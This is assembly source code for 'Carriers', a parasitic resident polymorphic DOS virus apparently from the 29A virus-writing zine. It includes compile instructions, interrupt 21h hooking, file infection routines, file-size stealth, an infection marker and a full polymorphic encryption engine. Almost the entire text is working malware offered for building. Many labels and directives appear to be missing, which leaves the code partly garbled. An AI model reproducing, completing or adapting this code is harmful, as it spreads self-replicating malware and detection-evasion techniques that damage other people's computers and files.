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29A Issue 02 05 10
comment *
Carriers is a 1332 bytes parasitic resident COM/EXE/Overlay virus. Infects
files at close file, delete file, get or set file attributes, load and/or
execute program and rename file by appending the virus to the infected file.
Carriers has an error handler, filesize stealth, retro structures and is
polymorphic in file using its internal polymorphic engine. Carriers is using
the server function call DOS exploit.
Compile Carriers with Turbo Assembler v 4.0 by typing:
.model tiny
jmp move_mcb
db 0dh dup(?) ; Memory Control Block (MCB)
cld ; Clear direction flag
push ds es ; Save segments at stack
call delta_offset
pop si ; Load SI from stack
sub si,(offset delta_offset-code_begin)
mov ax,ds ; AX = segment of PSP for current ...
dec ax ; AX = segment of current Memory C...
mov ds,ax ; DS = " " " " "
xor di,di ; Zero DI
cmp byte ptr [di],'Z' ; Last block in chain?
jne virus_exit ; Already resident? Jump to virus_...
mov byte ptr [di],'M' ; Not last block in chain
sub word ptr [di+03h],(data_end-code_begin+0fh)/10h
sub word ptr [di+12h],(data_end-code_begin+0fh)/10h
mov es,[di+12h] ; ES = segment of the virus
push si ; Save SI at stack
mov cx,(data_end-code_begin+01h)/02h
segcs ; Code segment as source segment
rep movsw ; Move the virus to top of memory
mov ds,cx ; DS = segment of interrupt table
lea di,int21_addr ; DI = offset of int21_addr
mov si,(21h*04h) ; SI = offset of interrupt 21h
movsw ; Get interrupt vector 21h
movsw ; " " " "
mov word ptr [si-04h],offset int21_virus
mov [si-02h],es ; Set interrupt vector 21h
pop si ; Load SI from stack
pop es ds ; Load segments from stack
mov ax,ds ; AX = segment of PSP for current ...
mov di,cs ; DI = code segment
cmp ax,di ; COM or EXE/Overlay executable?
je vir_com_exit ; Equal? Jump to vir_com_exit
add ax,10h ; AX = segment of beginning of EXE...
add cs:[si+initial_cs],ax
cli ; Clear interrupt-enable flag
initial_sp equ word ptr $+01h ; Initial SP
mov sp,00h ; SP = initial SP
initial_ss equ word ptr $+01h ; Initial SS relative to start of ...
add ax,00h ; Add initial SS relative to start...
mov ss,ax ; SS = initial SS relative to star...
sti ; Set interrupt-enable flag
call zero_regs
db 11101010b ; JMP imm32 (opcode 0eah)
initial_ip dw 00h ; Initial IP
initial_cs dw 0fff0h ; Initial CS relative to start of ...
mov di,100h ; DI = offset of beginning of code
push di ; Save DI at stack
lea si,[si+origin_code] ; SI = offset of origin_code
movsw ; Move the original code to beginning
movsb ; " " " " " "
zero_regs proc near ; Zero registers
xor ax,ax ; Zero AX
mov di,ax ; Zero DI
mov si,ax ; Zero SI
ret ; Return!
int21_virus proc near ; Interrupt 21h of Carriers
push bx cx ds es ; Save registers at stack
push ax ; Save AX at stack
cld ; Clear direction flag
mov al,ah ; AL = function number
cmp al,11h ; Find first matching file (FCB)?
je fcb_stealth ; Equal? Jump to fcb_stealth
cmp al,12h ; Find next matching file (FCB)?
je fcb_stealth ; Equal? Jump to fcb_stealth
cmp al,4eh ; Find first matching file (DTA)?
je dta_stealth ; Equal? Jump to dta_stealth
cmp al,4fh ; Find next matching file (DTA)?
je dta_stealth ; Equal? Jump to dta_stealth
push dx di si bp ; Save registers at stack
cmp al,41h ; Delete file?
je open_file ; Equal? Jump to open_file
cmp al,43h ; Get or set file attributes?
je open_file ; Equal? Jump to open_file
cmp al,4bh ; Load and/or execute program?
je open_file ; Equal? Jump to open_file
cmp al,56h ; Rename file?
je open_file ; Equal? Jump to open_file
cmp al,3eh ; Close file?
jne int21_exit ; Not equal? Jump to int21_exit
call infect_file
pop bp si di dx ; Load registers from stack
pop ax ; Load AX from stack
pop es ds cx bx ; Load registers from stack
int21_simula proc near ; Simulate interrupt 21h
db 11101010b ; JMP imm32 (opcode 0eah)
int21_addr dd ? ; Address of interrupt 21h
int24_virus proc near ; Interrupt 24h of Carriers
mov al,03h ; Fail system call in progress
int2a_virus proc near ; Interrupt 2Ah of Carriers
iret ; Interrupt return!
jmp open_file_
pop ax ; Load AX from stack
call int21_simu__
push ax ; Save AX at stack
pushf ; Save flags at stack
or al,al ; Successful?
jnz filesiz_exit ; Not successful? Jump to filesiz_...
mov ah,51h ; Get current PSP address
call int21_simu__
mov ds,bx ; DS = segment of PSP for current ...
cmp ds:[16h],bx ; Parent PSP equal to current PSP?
jne filesiz_exit ; Not equal? Jump to filesiz_exit
mov ah,2fh ; Get disk transfer area address
call int21_simul_
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
cmp byte ptr [bx],0ffh
jne not_extended ; Not extended FCB? Jump to not_ex...
add bx,07h ; BX = offset of normal FCB
mov ax,[bx+09h] ; AX = file extension
mov cl,[bx+0bh] ; CL = " "
mov ch,[bx+17h] ; CH = low-order byte of file time
add bx,03h ; BX = offset of filesize
jmp test_stealth
pop ax ; Load AX from stack
call int21_simu__
push ax ; Save AX at stack
pushf ; Save flags at stack
jc filesiz_exit ; Error? Jump to filesiz_exit
mov ah,2fh ; Get disk transfer area address
call int21_simul_
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
push si ; Save SI at stack
lea si,[bx+1eh] ; SI = offset of filename
lodsb ; AL = byte of filename
cmp al,'.' ; Found dot in filename?
jne find_dot ; Not equal? Jump to find_dot
lodsw ; AX = file extension
xchg ax,cx ; CX = " "
lodsb ; AL = file extension
xchg ax,cx ; CL = " "
pop si ; Load SI from stack
mov ch,[bx+16h] ; CH = low-order byte of file time
and ch,00011111b ; CH = seconds of file time
cmp ch,00011101b ; Infected (58 seconds)?
jne filesiz_exit ; Not infected? Jump to filesiz_exit
call tst_file_ext
jne filesiz_exit ; Not equal? Jump to filesiz_exit
sub [bx+1ah],(code_end-code_begin+1482h)
sbb word ptr [bx+1ch],00h
popf ; Load flags from stack
pop ax ; Load AX from stack
pop es ds cx bx ; Load registers from stack
retf 02h ; Return far and add option-pop-va...
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
mov ah,60h ; Canonicalize filename or path
lea di,filename ; DI = offset of filename
mov si,dx ; SI = " " "
call int21_simul_
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ax,3d00h ; Open file (read)
mov dx,di ; DX = offset of filename
call int21_simul_
xchg ax,bx ; BX = file handle
call infect_file
mov ah,3eh ; Close file
call int21_simul_
jmp int21_exit
int21_simul_ proc near ; Simulate interrupt 21h
push es ds di si dx cx bx ax
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
mov cx,08h ; Move sixteen bytes
lea dx,dpl_begin ; DX = offset of dpl_begin
mov di,dx ; DI = " " "
pop ax ; Load AX from stack
stosw ; Store register value within dpl_...
loop loop_stack
xor ax,ax ; Zero AX
stosw ; Store DOS parameter list (reserved)
stosw ; Store DOS parameter list (comput...
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ah,51h ; Get current PSP address
call int21_simu__
xchg ax,bx ; AX = segment of PSP for current ...
stosw ; Store segment of PSP for current...
mov ax,5d00h ; Server function call
int21_simu__ proc near ; Simulate interrupt 21h
pushf ; Save flags at stack
push cs ; Save CS at stack
call int21_simula
ret ; Return!
infect_file proc near ; Infect COM/EXE/Overlay file
mov si,(24h*04h)/10h ; SI = segment within interrupt table
mov ds,si ; DS = " " " "
xor si,si ; Zero SI
push [si+(24h*04h)-(24h*04h)]
push [si+(24h*04h+02h)-(24h*04h)]
mov word ptr [si+(24h*04h)-(24h*04h)],offset int24_virus
mov [si+(24h*04h+02h)-(24h*04h)],cs
push [si+(2ah*04h)-(24h*04h)]
push [si+(2ah*04h+02h)-(24h*04h)]
mov word ptr [si+(2ah*04h)-(24h*04h)],offset int2a_virus
mov [si+(2ah*04h+02h)-(24h*04h)],cs
push ds ; Save DS at stack
mov ax,1220h ; Get system file table number
int 2fh
push bx ; Save BX at stack
mov ax,1216h ; Get address of system FCB
mov bl,es:[di] ; BL = system file table entry
int 2fh
pop bx ; Load BX from stack
mov byte ptr es:[di+02h],02h
test byte ptr es:[di+05h],10000000b
jnz infect_exit ; Character device? Jump to infect...
mov ax,es:[di+28h] ; AX = file extension
mov cl,es:[di+2ah] ; CL = " "
call tst_file_ext
jne infect_exit ; Not equal? Jump to infect_exit
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov al,es:[di+0dh] ; AL = low-order byte of file time
and al,00011111b ; AL = seconds of file time
cmp al,00011101b ; Previously infected (58 seconds)?
je infect_exit ; Equal? Jump to infect_exit
mov es:[di+15h],si ; Set current file position (SOF)
mov es:[di+17h],si ; Set current file position (SOF)
mov ah,3fh ; Read from file
mov cx,18h ; Read twenty-four bytes
lea dx,origin_code ; DX = offset of origin_code
call int21_simul_
mov es:[di+15h],si ; Set current file position (SOF)
push di ; Save DI at stack
mov cl,0bh ; Compare eleven bytes
add di,20h ; DI = offset of filename
lea si,command_com ; SI = offset of command_com
rep cmpsb ; COMMAND.COM?
pop di ; Load DI from stack
je infect_exit ; Equal? Jump to infect_exit
mov si,dx ; SI = offset of origin_code
mov ax,es:[di+11h] ; AX = low-order word of filesize
mov dx,es:[di+13h] ; AX = high-order word of filesize
or dx,dx ; Filesize too small?
jnz test_exe_sig ; Not zero? Jump to test_exe_sig
cmp ax,1000h ; Filesize too small?
jae test_exe_sig ; Above or equal? Jump to infect_exit
jmp infect_exit_
mov cx,[si] ; CX = EXE/Overlay signature
xor cx,'MZ' ; EXE/Overlay signature?
jz test_exe_ov ; Found EXE/Overlay signature? Jum...
xor cx,('ZM' xor 'MZ') ; EXE/Overlay signature?
jz test_exe_ov ; Found EXE/Overlay signature? Jum...
cmp ax,0fef8h-(data_end-code_begin)
ja infect_exit ; Above? Jump to infect_exit
mov cx,03h ; Write three bytes
sub ax,cx ; AX = offset of virus within infe...
mov [virus_offset],ax ; Store offset of virus within inf...
add ax,103h ; AX = decryptor's offset
xchg ax,bp ; BP = " "
xor al,al ; AL = flags
lea dx,infect_code ; DX = offset of infect_code
jmp infect_file_
push dx ; Save DX at stack
push ax ; " AX " "
call div_by_pages
pop cx ; Load CX from stack (AX)
xchg ax,cx ; AX = low-order byte of filesize
cmp dx,[si+02h] ; Internal overlay?
pop dx ; Load DX from stack
jne infect_exit ; Not equal? Jump to infect_exit
cmp cx,[si+04h] ; Internal overlay?
jne infect_exit ; Not equal? Jump to infect_exit
cmp byte ptr [si+18h],40h
je infect_exit ; New executable? Jump to infect_exit
push ax dx ; Save registers at stack
push di si es ; " " " "
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
lea di,initial_ss ; DI = offset of initial_ss
add si,0eh ; SI = offset of initial SS relati...
movsw ; Store initial SS relative to sta...
lea di,initial_sp ; DI = offset of initial_sp
movsw ; Store initial SP
lea di,initial_ip-02h ; DI = offset of initial_ip - 02h
cmpsw ; SI = offset of initial IP
movsw ; Store initial IP
movsw ; Store initial CS relative to sta...
mov cx,10h ; Divide by paragraphs
div cx ; DX:AX = filesize in paragraphs
mov bp,dx ; BP = decryptor's offset
pop es si di ; Load registers from stack
sub ax,[si+08h] ; Subtract header size in paragrap...
mov [si+14h],dx ; Store initial IP
mov [si+16h],ax ; Store initial CS relative to sta...
add ax,((code_end-code_begin+1491h)/10h+01h)
mov [si+0eh],ax ; Store initial SS relative to sta...
and word ptr [si+10h],1111111111111110b
pop dx ax ; Load registers from stack
add ax,(code_end-code_begin+1482h)
adc dx,00h ; Convert to 32-bit
call div_by_pages
mov [si+04h],ax ; Store total number of 512-bytes ...
mov [si+02h],dx ; Store number of bytes in last 51...
mov al,00000011b ; AL = flags
mov cx,18h ; Write twenty-four bytes
mov dx,si ; DX = offset of origin_code
push es:[di+0dh] ; Save file time at stack
push es:[di+0fh] ; Save file date at stack
push ax ; Save AX at stack
mov ah,40h ; Write to file
call int21_simul_
add di,15h ; DI = offset of current offset in...
lea si,[di-04h] ; SI = offset of filesize
seges ; Extra segment as source segment
movsw ; Move low-order word of filesize ...
seges ; Extra segment as source segment
movsw ; Move high-order word of filesize...
pop ax ; Load AX from stack
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
mov cx,(code_end-code_begin)
lea di,data_buffer ; DI = offset of data_buffer
xor si,si ; Zero SI
push bx di ; Save registers at stack
call c_pe_poly
mov ah,40h ; Write to file
mov cx,(code_end-code_begin+1482h)
pop dx bx ; Load registers from stack
call int21_simul_
mov ax,5701h ; Set file's date and time
pop dx ; Load DX from stack (file date)
pop cx ; Load CX from stack (file time)
and cl,11100000b ; CX = hours and minutes of file time
or cl,00011101b ; Set infection mark (58 seconds)
call int21_simul_
xor si,si ; Zero SI
pop ds ; Save DS at stack
pop [si+(2ah*04h+02h)-(24h*04h)]
pop [si+(2ah*04h)-(24h*04h)]
pop [si+(24h*04h+02h)-(24h*04h)]
pop [si+(24h*04h)-(24h*04h)]
ret ; Return!
tst_file_ext proc near ; Test file extension
cmp ax,'OC' ; COM executable?
jne test_exe ; Not equal? Jump to test_exe
cmp cl,'M' ; COM executable?
ret ; Return!
cmp ax,'XE' ; EXE executable?
jne test_ov ; Not equal? Jump to test_ov
cmp cl,'E' ; EXE executable?
ret ; Return!
cmp ax,'VO' ; OV? executable?
jne tst_fil_exit ; Not equal? Jump to tst_fil_exit
cmp cl,'L' ; OVL executable?
je tst_fil_exit ; Equal? Jump to tst_fil_exit
cmp cl,'R' ; OVR executable?
ret ; Return!
div_by_pages proc near ; Divide by pages
mov cx,200h ; Divide by pages
div cx ; DX:AX = filesize in pages
or dx,dx ; No bytes in last 512-bytes page ...
je dont_inc_pag ; Equal? Jump to dont_inc_pag
inc ax ; Increase total number of 512-byt...
comment *
Carriers (polymorphic engine) ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Calling parameters:
AL Flags
CX Length of original code
BP Decryptor's offset
DS:SI Pointer to original code
ES:DI Pointer to decryptor + encrypted code
Return parameters:
CX Length of decryptor + encrypted code
xxxxxxx1 Generate CS: in front of the decryption opcode.
xxxxxx1x Generate garbage in the beginning.
111111xx Unused.
Garbage instructions:
JMP imm8; JMP imm16
Count/index registers:
Registers holding the decryption key:
(One garbage instruction).
(MOV reg,imm); MOV reg16,imm16 (Decryption key)
(One garbage instruction).
MOV reg16,imm16; (MOV reg,imm) (Offset of encrypted code)
One garbage instruction.
ADD (CS:)[reg16],imm/reg; SUB (CS:)[reg16],imm/reg; XOR (CS:)[reg16],im...
One garbage instruction.
ADD reg16,01h; ADD reg16,02h; INC reg16; INC reg16, INC reg16, SUB reg1...
One garbage instruction.
CMP reg16,imm16 (End of encrypted code)
JA imm8/JAE imm8/JE imm8 (Beginning of encrypted code)
JMP imm16 (Beginning of ADD (CS:)[reg16],imm8/reg8; SUB (CS:)[reg16],i...
One garbage instruction.
Min. decryptor size: 271 bytes.
Max. decryptor size: 5250 bytes.
Carriers (polymorphic engine) size: 487 bytes.
I would like to thank Tcp/29A for the help and Rhincewind/VLAD for the
Random Number Generator (RNG).
c_pe_poly proc near ; Carriers (polymorphic engine)
push si ; Save SI at stack
push cx ; " CX " "
push cx ; " CX " "
push di ; " DI " "
push ax ; " AX " "
test al,00000010b ; Generate garbage in the beginning?
jz get_regs ; Zero? Jump to get_regs
call gen_garbage
mov ax,04h ; Random number within four
call rnd_in_range
xchg ax,bx ; BL = count/index register number
lea si,[bx+index_table] ; SI = offset of count/index register
lodsb ; AL = count/index register
mov dh,al ; DH = " "
call get_rnd_num_
mov dl,al ; DL = register holding decryption...
and al,00001111b ; AL = " " "
cmp al,00001100b ; Stack pointer (SP)?
je get_key_reg ; Equal? Jump to get_key_reg
test al,00001000b ; 16-bit encryption/decryption key?
jnz test_reg16 ; Not zero? Jump to test_reg16
and al,00000011b ; AL = register holding decryption...
and al,00000111b ; AL = register holding decryption...
cmp al,dh ; Count/index register equal to r...?
je get_regs ; Equal? Jump to get_regs
test dl,00010000b ; Generate MOV reg,imm first and ...?
jz gen_mov_r16_ ; Zero? Jump to gen_mov_r16_
call gen_mov_reg
call gen_mov_r16
jmp test_gen_cs
call gen_mov_r16
call gen_mov_reg
mov [decrypt_off],di ; Store offset of decryption opcode
pop ax ; Load AX from stack
test al,00000001b ; Generate CS: in front of the de...?
jnz gen_cs ; Not zero? Jump to gen_cs
test dl,00100000b ; Generate CS?
jz dont_gen_cs ; Zero? Jump to dont_gen_cs
mov al,00101110b ; CS:
stosb ; Store CS:
call tst_key_size
lea si,decrypt_tbl ; SI = offset of decrypt_tbl
test dl,01000000b ; Register holding decryption key?
jz key_reg_used ; Zero? Jump to key_reg_used
or al,10000000b ; ADD [reg16],imm/SUB [reg16],imm/...
stosb ; Store ADD [reg16],imm/SUB [reg16...
call lod_rnd_byte
call gen_decrypt_
call sto_temp_imm
jmp gen_inc_r16_
xchg ax,cx ; CL = decryption algorithm
call lod_rnd_byte
or al,cl ; ADD [reg16],imm/SUB [reg16],imm/...
stosb ; Store ADD [reg16],imm/SUB [reg16...
mov al,dl ; AL = register holding decryption...
mov cl,03h ; Shift register holding decryptio...
and al,00000111b ; AL = register holding decryption...
shl al,cl ; AL = " " "
call gen_decrypt_
call gen_garbage
mov ax,04h ; Random number within four
call rnd_in_range
lea si,inc_r16_tbl-01h ; SI = offset of inc_r16_tbl-01h
shl ax,01h ; Multiply increase index register...
add si,ax ; SI = offset of increase index re...
lodsw ; AX = increase index register opcode
or ah,dh ; AH = count/index register
cmp ah,01000111b ; INC reg16?
ja sto_inc_r16 ; Above? Jump to sto_inc_r16
mov al,ah ; INC reg16; INC reg16
stosw ; Store INC reg16; INC reg16
call tst_key_siz_
jmp gen_cmp_r16_
stosw ; Store increase index register op...
xchg ax,bx ; BX = increase index register opcode
call tst_key_size
inc ax ; Increase 16-bit immediate
cmp bh,11101000b ; SUB reg16,imm16?
jb sto_inc_r16_ ; Below? Jump to sto_inc_r16_
neg ax ; Negate 16-bit immediate
stosw ; Store 16-bit immediate
cmp bl,10000011b ; ADD reg16,imm8?
jne gen_cmp_r16 ; Not equal? Jump to gen_cmp_r16
dec di ; 8-bit immediate
call gen_garbage
mov ax,1111100010000001b
or ah,dh ; CMP reg16,imm16
stosw ; Store CMP reg16,imm16
mov [cmp_r16_i16],di ; Store offset of CMP reg16,imm16
stosw ; Store 16-bit immediate
push cx ; Save CX at stack
lea si,jmp_imm8_tbl ; SI = offset of jmp_imm8_tbl
call lod_rnd_byte
stosb ; Store jump condition
mov ax,80h ; Random number within one hundred...
call rnd_in_range
cmp ax,40h ; Below sixty-four bytes?
jb get_rnd_num ; Below? Jump to get_rnd_num
stosb ; Store 8-bit immediate
xchg cx,ax ; CX = 8-bit immediate
mov al,11101001b ; JMP imm16
stosb ; Store JMP imm16
decrypt_off equ word ptr $+01h ; Offset of decryption opcode
mov ax,00h ; DI = offset of decryption opcode
sub ax,di ; Subtract offset of end of JMP im...
dec ax ; Decrease 16-bit immediate
dec ax ; " " "
stosw ; Store 16-bit immediate
sub cx,(mcb_end-mcb+03h)
call get_rnd_num_
stosb ; Store 8-bit random number
loop garbage_loop
pop cx ; Load CX from stack
pop ax ; Load AX from stack (DI)
sub ax,di ; AX = length of decryptor
neg ax ; Negate length of decryptor
add ax,bp ; AX = offset of encrypted code wi...
mov_r16_i16 equ word ptr $+01h ; Offset of MOV reg16,imm16
mov ds:[00h],ax ; Store offset of encrypted code
pop bx ; Load BX from stack (CX)
test bl,00000001b ; Align offset of end of encrypte...?
jz sto_cmp_r16 ; Zero? Jump to sto_cmp_r16
inc bx ; Increase offset of end of encryp...
add ax,bx ; Add length of original code to o...
cmp_r16_i16 equ word ptr $+01h ; Offset of CMP reg16,imm16
mov ds:[00h],ax ; Store offset of end of encrypted...
push di ; Save DI at stack
lea bx,encrypt_tbl ; BX = offset of encrypt_tbl
lea di,encrypt_algo ; DI = offset of encrypt_algo
add bl,ch ; Add encryption/decryption algor...
mov al,[bx] ; AL = encryption algorithm
mov bx,di ; BX = offset of encrypt_algo
stosb ; Store encryption algorithm
inc di ; Increase index register
stosb ; Store encryption algorithm
call get_rnd_num_
and al,ah ; Weak encryption/decryption key?
jz get_rnd_key ; Zero? Jump to get_rnd_key
cmp al,ah ; Weak encryption/decryption key?
je get_rnd_key ; Equal? Jump to get_rnd_key
mov_reg_imm equ word ptr $+01h ; Offset of MOV reg,imm
mov di,00h ; BX = offset of MOV reg,imm
test dl,00001000b ; 8-bit encryption/decryption key?
jz store_key ; Zero? Jump to store_key
stosw ; Store 16-bit encryption/decrypti...
inc byte ptr [bx] ; Store encryption algorithm
mov byte ptr [bx+02h],00111000b
db 00111000b ; CMP [BP+SI+0AAC4],CL (opcode 38h)
mov al,ah ; AL = 8-bit encryption/decryption...
stosb ; Store 8-bit encryption/decryptio...
xchg ax,bx ; BX = encryption/decryption key
pop di ; Load DI from stack
pop cx ; Load CX from stack
inc cx ; Increase length of original code
shr cx,01h ; Divide length of original code b...
pop si ; Load SI from stack
lodsw ; AX = word of original code
encrypt_algo equ byte ptr $ ; Offset of encryption algorithm
add al,bl ; AL = encrypted low-order byte of...
add ah,bh ; AH = encrypted high-order byte o...
stosw ; Store encrypted word
loop encrypt_loop
ret ; Return!
gen_mov_reg proc near ; Generate MOV reg,imm
mov al,dl ; AL = register holding decryption...
test al,01000000b ; Register holding decryption key?
jnz gen_mov_exit ; Not zero? Jump gen_mov_exit
or al,10110000b ; MOV reg,imm
stosb ; Store MOV reg,imm
call sto_temp_imm
ret ; Return!
gen_mov_r16 proc near ; Generate MOV reg16,imm16
mov al,dh ; AL = count/index register
or al,10111000b ; MOV reg16,imm16
stosb ; Store MOV reg16,imm16
mov [mov_r16_i16],di ; Store offset of MOV reg16,imm16
stosw ; Store 16-bit immediate
call gen_garbage
ret ; Return!
tst_key_size proc near ; Test size of encryption/decrypti...
xor ax,ax ; Zero AX
test dl,00001000b ; 8-bit encryption/decryption key?
jz tst_key_exit ; Zero? Jump to tst_key_exit
inc ax ; 16-bit encryption/decryption key
ret ; Return!
lod_rnd_byte proc near ; Load random byte within table
mov ax,03h ; Random number within three
call rnd_in_range
mov ch,al ; CH = random number within three
add si,ax ; SI = offset of within table
lodsb ; AL = byte of table
ret ; Return!
gen_decrypt_ proc near ; Generate decryption opcode
mov cl,al ; CL = decryption algorithm
lea si,[bx+index_table_]
lodsb ; AL = count/index register
or al,cl ; ADD [reg16],imm/SUB [reg16],imm/...
stosb ; Store ADD [reg16],imm/SUB [reg16...
test al,01000000b ; Base pointer?
jz didnt_use_bp ; Zero? Jump to didnt_use_bp
xor al,al ; Zero 8-bit immediate
stosb ; Store 8-bit immediate
ret ; Return!
sto_temp_imm proc near ; Store temporary immediate
mov [mov_reg_imm],di ; Store offset of MOV reg16,imm16
stosw ; Store 16-bit immediate
tst_key_siz_ proc near ; Test size of encryption/decrypti...
test dl,00001000b ; 16-bit encryption/decryption key?
jnz gen_garbage ; Not zero? Jump to gen_garbage
dec di ; 8-bit immediate
gen_garbage proc near ; Generate garbage
push ax cx ; Save registers at stack
mov ax,401h ; Random number within one thousan...
call rnd_in_range
cmp ax,40h ; Below sixty-four bytes?
jb gen_garbage_ ; Below? Jump to gen_garbage_
push ax ; Save AX at stack
cmp ax,80h ; Generate JMP imm8 or JMP imm16?
mov al,11101011b ; JMP imm8 (opcode 0ebh)
jb gen_jmp_i8 ; Below? Jump to gen_jmp_i8
mov al,11101001b ; JMP imm16 (opcode 0e9h)
stosb ; Store JMP imm8/JMP imm16
pop ax ; Load AX from stack
stosb ; Store 8-bit immediate
jb gen_jmp_i8_ ; Below? Jump to gen_jmp_i8_
dec di ; Decrease index register
stosw ; Store 16-bit immediate
xchg cx,ax ; CX = number of random bytes
call get_rnd_num_
stosb ; Store 8-bit random number
loop garbage_loo_
pop cx ax ; Load registers from stack
ret ; Return!
rnd_in_range proc near ; Random number within range
push bx dx ; Save registers at stack
xchg ax,bx ; BX = number within range
call get_rnd_num_
xor dx,dx ; Zero DX
div bx ; DX = random number within range
xchg ax,dx ; AX = " " " "
pop dx bx ; Load registers from stack
ret ; Return!
; Modified version of the Random Number Generator (RNG) used in the Rickety
; and Hardly Insidious yet New Chaos Engine v 1.00 [RHINCE] by
; Rhincewind/VLAD.
get_rnd_num_ proc near ; Get 16-bit random number
in al,40h ; AL = 8-bit random number
mov ah,al ; AH = " " "
in al,40h ; AL = " " "
random_num equ word ptr $+01h ; 16-bit random number
adc ax,00h ; AX = 16-bit random number
mov [random_num],ax ; Store 16-bit random number
ret ; Return!
index_table db 00000011b ; Base register
db 00000101b ; Base pointer
db 00000110b ; Source index
index_table_ db 00000111b ; Destination/base register
db 01000110b ; Base pointer
db 00000100b ; Source index
db 00000101b ; Destination index
decrypt_tbl db 00000000b ; ADD [reg16],imm
db 00110000b ; XOR [reg16],imm
db 00101000b ; SUB [reg16],imm
inc_r16_tbl db 01000000b ; INC reg16
dw 1100000010000011b ; ADD reg16,imm8
dw 1100000010000001b ; ADD reg16,imm16
dw 1110100010000001b ; SUB reg16,imm16
jmp_imm8_tbl db 01110011b ; JAE imm8
db 01110100b ; JE imm8
db 01110111b ; JA imm8
encrypt_tbl db 00101010b ; SUB reg8,reg8
db 00110010b ; XOR reg8,reg8
db 00000010b ; ADD reg8,reg8
command_com db 'COMMAND COM' ; COMMAND.COM
virus_offset equ word ptr $+01h ; Offset of virus within infected ...
infect_code db 11101001b,?,? ; JMP imm16 (opcode 0e9h)
virus_name db ' [Carriers]' ; Name of the virus
virus_author db ' [Darkman/29A] ' ; Author of the virus
origin_code db 11001101b,00100000b,?
db 15h dup(?) ; Original code of infected file
filename db 80h dup(?) ; Canonicalized filename
; DOS parameter list
dpl_ax dw ? ; Accumulator register
dpl_bx dw ? ; Base register
dpl_cx dw ? ; Count register
dpl_dx dw ? ; Data register
dpl_si dw ? ; Source index
dpl_di dw ? ; Destination index
dpl_ds dw ? ; Data segment
dpl_es dw ? ; Extra segment
dpl_reserved dw 00h ; Reserved
dpl_comp_id dw 00h ; Computer ID
dpl_proc_id dw ? ; Process ID
data_buffer db (code_end-code_begin+1482h) dup(?)
cld ; Clear direction flag
mov cx,(mcb_end-mcb)/02h
lea di,code_begin+100h ; DI = offset of code_begin
lea si,mcb+100h ; SI = offset of mcb
rep movsw ; Move Memory Control Block (MCB) ...
jmp virus_begin
mcb db 'Z' ; Last block in chain
dw 08h ; Memory Control Block (MCB) belon...
dw (data_end-virus_begin+0fh)/10h
db 00h,00h,00h,'SC',06h dup(00h)
end code_begin